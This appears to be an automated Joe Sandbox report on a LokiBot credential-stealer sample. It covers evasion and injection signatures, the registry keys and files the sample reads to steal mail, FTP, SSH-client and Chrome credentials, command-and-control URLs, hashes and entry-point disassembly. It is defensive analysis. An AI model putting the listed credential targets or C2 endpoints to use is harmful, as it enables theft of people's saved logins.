              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exe TID: 7060Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_0040290B FindFirstFileW,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeThread delayed: delay time: 60000
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 1_2_008A03F8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 1_2_008A061D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 1_2_008A0772 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 1_2_008A0736 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 1_2_008A06F7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeMemory written: C:\Users\user\AppData\Local\Temp\dtlrkp.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess created: C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_00406069 GetUserNameW,

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dtlrkp.exe PID: 7032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dtlrkp.exe PID: 7056, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: PopPassword
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: SmtpPassword
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API
              Path Interception1
              Access Token Manipulation
              1
              Masquerading
              2
              OS Credential Dumping
              1
              Security Software Discovery
              Remote Services1
              Email Collection
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
              Process Injection
              11
              Virtualization/Sandbox Evasion
              2
              Credentials in Registry
              11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              Exfiltration Over Bluetooth1
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Access Token Manipulation
              Security Account Manager1
              Account Discovery
              SMB/Windows Admin Shares2
              Data from Local System
              Automated Exfiltration1
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
              Process Injection
              NTDS1
              System Owner/User Discovery
              Distributed Component Object Model1
              Clipboard Data
              Scheduled Transfer111
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets2
              File and Directory Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common2
              Obfuscated Files or Information
              Cached Domain Credentials5
              System Information Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              vNcHHC1HKe.exe33%VirustotalBrowse
              vNcHHC1HKe.exe48%ReversingLabsWin32.Trojan.LokiBot
              vNcHHC1HKe.exe100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              1.2.dtlrkp.exe.8b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              3.0.dtlrkp.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              3.0.dtlrkp.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              3.0.dtlrkp.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              3.2.dtlrkp.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              3.0.dtlrkp.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              3.0.dtlrkp.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              3.0.dtlrkp.exe.400000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://37.0.11.227/sarag/five/fre.php100%Avira URL Cloudmalware
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://37.0.11.227/sarag/five/fre.phptrue
              • Avira URL Cloud: malware
              unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nsis.sf.net/NSIS_ErrorErrorvNcHHC1HKe.exefalse
                high
                http://www.ibsensoftware.com/dtlrkp.exe, dtlrkp.exe, 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dtlrkp.exe, 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                37.0.11.227
                unknownNetherlands
                198301WKD-ASIEtrue
                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:620804
                Start date and time: 05/05/202209:01:482022-05-05 09:01:48 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 51s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:vNcHHC1HKe (renamed file extension from none to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:20
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@5/6@0/1
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 94.8% (good quality ratio 91.4%)
                • Quality average: 79.3%
                • Quality standard deviation: 27.5%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • HTTP Packets have been reduced
                • TCP Packets have been reduced to 100
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                09:03:12API Interceptor42x Sleep call for process: dtlrkp.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Users\user\Desktop\vNcHHC1HKe.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):5632
                Entropy (8bit):4.515696866664655
                Encrypted:false
                SSDEEP:96:X5xfhGYXbJCrK+Mhgx+MeBZtXIpXSdOWPmoynsx:X5xfYYXwWh4eBZVIpidPPmoyn
                MD5:8B30D9F0EE85F71C5599DCB7701CE2D8
                SHA1:017FB9D1914E5582D86E201E0B7081753EE32C16
                SHA-256:57616ECF2F2355F4BCBA77C0A01B6081F7C24CBED9658BB79CC42BA19BD13EF0
                SHA-512:7AA43ABE21E5202B2A2984A6DADB0224F9B049EBBFD42D790CD7F96CE3F93C4B09EF19140277D08FED21EA5FFC4038F3B6C4BC28309FF5A5E82E1A3525E0970B
                Malicious:true
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.1..m_B.m_B.m_B.r[B.m_B.qQB.m_B.rUB.m_BK.^C.m_B.m^B]m_B.3[C.m_B.3.B.m_B.3]C.m_BRich.m_B........PE..L...01sb..................................... ....@..........................P...............................................".......@...............................!............................................... ..`............................text...r........................... ..`.rdata....... ......................@..@.data...<....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\vNcHHC1HKe.exe
                File Type:data
                Category:dropped
                Size (bytes):5194
                Entropy (8bit):6.134472067894398
                Encrypted:false
                SSDEEP:96:aGVs6aWb3CLa7M1TJfgTRdgeIFqVbucMrlEqN/KSCOyDkQ6yEet:aGu6aWzCW7of61IFqNg6yvyIcEE
                MD5:19BE22AB21AF9DFDC9C6D22DA14EA0FD
                SHA1:2AE84D7E3A14F58CEEA593E559127E96A62422F4
                SHA-256:6E5040F059188400A96DEE6433BE85A859E2E4F28D73842CD7C31EFFC0C95E8D
                SHA-512:DD67366179F6CDFE461D0796DE3AA1EF6A52D325727C9342811455399E4C3A8C2ADD9FD19738134262D56F3B815B83C744131AFC372AD9AFED42FC3F44CABEB9
                Malicious:false
                Reputation:low
                Preview:.....n.v.....v......F4....F4.v...4.Q...v....d..d.l4.).....p4.p...d..d.l4.).....p4.p...d..d.l4.).....p4.p...d..d.l4.).....p4.p..v\..c......4..p4.p..n4.v..&.p4.p,.n4.n,.l..&.....n4....l..p4..p..v...&.....v.U..N...d...d...d....d....d.z.d.{t.e.1n..1p-.9v..d..d...n4...p4.........5U.V...v.U.n..{zn4.z{~....n.((...F4.n4.n..4.f9n4.n.n,.nE.n5..p..p4.n4.n..n,.p.n4.n.....C.Z..........E....Z.y...........}.Z.+....5.....n.v.Q...F4..4.....l4.p4.v\..eCn4...n4..p4.n4.1p4....1...t.e3n4......p5..p...l4......p5..p........l5..)....Z.....).....p4...l4.).d../...p4.v\..e.v.....4.....n4.....n.v.....F4..4.Q...l4.p4.v\..eCn4...n4..p4.n4.1p4........t..uo...n4......p5.p..n4......p5.p..n4.....p5.p..n4E&.......p5D.p-D.l4......p5.p......l5..).C.Z.....).....p4.v\A.e.n4.n,Ap..B.dA.dE.d..d..d.. ...p4.v\..e.v.....4.....n4...E.n.v.=.4.....l4.p4.v\..eCn4...n4..p4.n4.1p4........t.e3n4......p5..p...n4......p5..p........l5..)..}.Z.T...).M...p4....d..d.....
                Process:C:\Users\user\Desktop\vNcHHC1HKe.exe
                File Type:data
                Category:dropped
                Size (bytes):106495
                Entropy (8bit):7.95401114500379
                Encrypted:false
                SSDEEP:1536:TGNdVycqGacPUuHRm6La1B2HpMVXJcAIc1c3LT0PBCuaAoQ/9uUWumSWyR:sWcq2UuJaSpEwcCEPBCTAhVumWyR
                MD5:232A82FA0023BE63B64ACD8ADE3D1E85
                SHA1:BC4A4E69A8BC9628FA80EA05683C2CAD70CEE18E
                SHA-256:DC049F4F8FE69AB69C7B86AF32B4C5A671E158329130C8718E40B4EC093ED725
                SHA-512:8FB6038B9570605CE0F30DD808F75C4B0C4FCA0FBD06C993B39EF1AD7CBD30B19A8EC24D4F89EBBB1453A5CF9AEA0C1777CBA36C5AEB008ABEAD45D0A53CF153
                Malicious:false
                Reputation:low
                Preview:...#......Yo.b.c......K....|...!.P.....e.K...W.~.v......uWy..<..\.%zI..e....+....\.L.(.2..ZJ..H.v.....0R..4:...,.w./..A^.8...]..+......g.......6~.D.N..ODL.WI.B....E.1.f.=m..<.H....s..].v....[../=.~+:h8..cO<.O..Z..2.BM....JB.a!.L4...'.'..s;+.z....A.v#.D...G........M.=...|..J..P.\..\e.K...=.v.......Wy..!....... 5#.....~...jq../l5......v&....}.9.[.{.>5^./..A^..$(:..H.XY.....-.Sm..U.h.F.O..`E..E.r.?.D..5....n..9.....Jb'..T<!/.(w.F-...<..S....w..K.k..\YF.H.|m...{...L....E.'.ea.;-.z............o....~6..%_...@....!.P%....e.K...W.~.J......OWy..4...*...$.f.....~....qZ7/J@......v&|...}......,.5^./..A^..$(:..H7XY.....-.Sm..U.h.F.O..`E..E.r.?.D..5....n..9.....Jb'..T<!/.(w.a...<..S....w..K.k..\YF.H.|m.JB.a!.L)5.E..'....;+.z............o..c.....uK....|...!.P.....e.K...W.~.v.......Wy..1.......$5#.....~....q.7/l5......v&....}.......>5^./..A^..$(:..H.XY.....-.Sm..U.h.F.O..`E..E.r.?.D..5....n..9.....Jb'..T<!/.(w.a...<..S....w..K.k..\YF.H.|m.
                Process:C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):5632
                Entropy (8bit):4.515696866664655
                Encrypted:false
                SSDEEP:96:X5xfhGYXbJCrK+Mhgx+MeBZtXIpXSdOWPmoynsx:X5xfYYXwWh4eBZVIpidPPmoyn
                MD5:8B30D9F0EE85F71C5599DCB7701CE2D8
                SHA1:017FB9D1914E5582D86E201E0B7081753EE32C16
                SHA-256:57616ECF2F2355F4BCBA77C0A01B6081F7C24CBED9658BB79CC42BA19BD13EF0
                SHA-512:7AA43ABE21E5202B2A2984A6DADB0224F9B049EBBFD42D790CD7F96CE3F93C4B09EF19140277D08FED21EA5FFC4038F3B6C4BC28309FF5A5E82E1A3525E0970B
                Malicious:false
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.1..m_B.m_B.m_B.r[B.m_B.qQB.m_B.rUB.m_BK.^C.m_B.m^B]m_B.3[C.m_B.3.B.m_B.3]C.m_BRich.m_B........PE..L...01sb..................................... ....@..........................P...............................................".......@...............................!............................................... ..`............................text...r........................... ..`.rdata....... ......................@..@.data...<....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                File Type:data
                Category:dropped
                Size (bytes):49
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:884BB48A55DA67B4812805CB8905277D
                SHA1:6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
                SHA-256:78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
                SHA-512:989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
                Malicious:false
                Preview:.................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.737164313842715
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:vNcHHC1HKe.exe
                File size:126888
                MD5:8c7e9d4d5f172854a531a86d34af2c8c
                SHA1:43d99c2bf4d5fce1b640b4ee65b234ced6292c35
                SHA256:7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19
                SHA512:d8b28dd232248da57d2762363661a80762c17822baff5d1a3efdd4ae1e160b6a85f77d9f5a09e1ebe0b653e8dbdbde65b36c08873a8d8ed5bfb3a9d48c865c5c
                SSDEEP:1536:lsuNLvSFVVeozLpPunbrmI7ngp4GpYis8ycoLxPNh8fXuEMygzMRLqBcV7W55IUK:l1NjcVVnLpPunbjLgFcJcq7bNw3g4V
                TLSH:20C3F1583BA1C0BBD4F307B21D395BA78EF6D623243457475710BB4D3AA2A42DB1E361
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                Icon Hash:b2a88c96b2ca6a72
                Entrypoint:0x4034f7
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                Instruction
                push ebp
                mov ebp, esp
                sub esp, 000003F4h
                push ebx
                push esi
                push edi
                push 00000020h
                pop edi
                xor ebx, ebx
                push 00008001h
                mov dword ptr [ebp-14h], ebx
                mov dword ptr [ebp-04h], 0040A2E0h
                mov dword ptr [ebp-10h], ebx
                call dword ptr [004080CCh]
                mov esi, dword ptr [004080D0h]
                lea eax, dword ptr [ebp-00000140h]
                push eax
                mov dword ptr [ebp-0000012Ch], ebx
                mov dword ptr [ebp-2Ch], ebx
                mov dword ptr [ebp-28h], ebx
                mov dword ptr [ebp-00000140h], 0000011Ch
                call esi
                test eax, eax
                jne 00007FB660C7809Ah
                lea eax, dword ptr [ebp-00000140h]
                mov dword ptr [ebp-00000140h], 00000114h
                push eax
                call esi
                mov ax, word ptr [ebp-0000012Ch]
                mov ecx, dword ptr [ebp-00000112h]
                sub ax, 00000053h
                add ecx, FFFFFFD0h
                neg ax
                sbb eax, eax
                mov byte ptr [ebp-26h], 00000004h
                not eax
                and eax, ecx
                mov word ptr [ebp-2Ch], ax
                cmp dword ptr [ebp-0000013Ch], 0Ah
                jnc 00007FB660C7806Ah
                and word ptr [ebp-00000132h], 0000h
                mov eax, dword ptr [ebp-00000134h]
                movzx ecx, byte ptr [ebp-00000138h]
                mov dword ptr [0042A2D8h], eax
                xor eax, eax
                mov ah, byte ptr [ebp-0000013Ch]
                movzx eax, ax
                or eax, ecx
                xor ecx, ecx
                mov ch, byte ptr [ebp-2Ch]
                movzx ecx, cx
                shl eax, 10h
                or eax, ecx
                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xa50.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
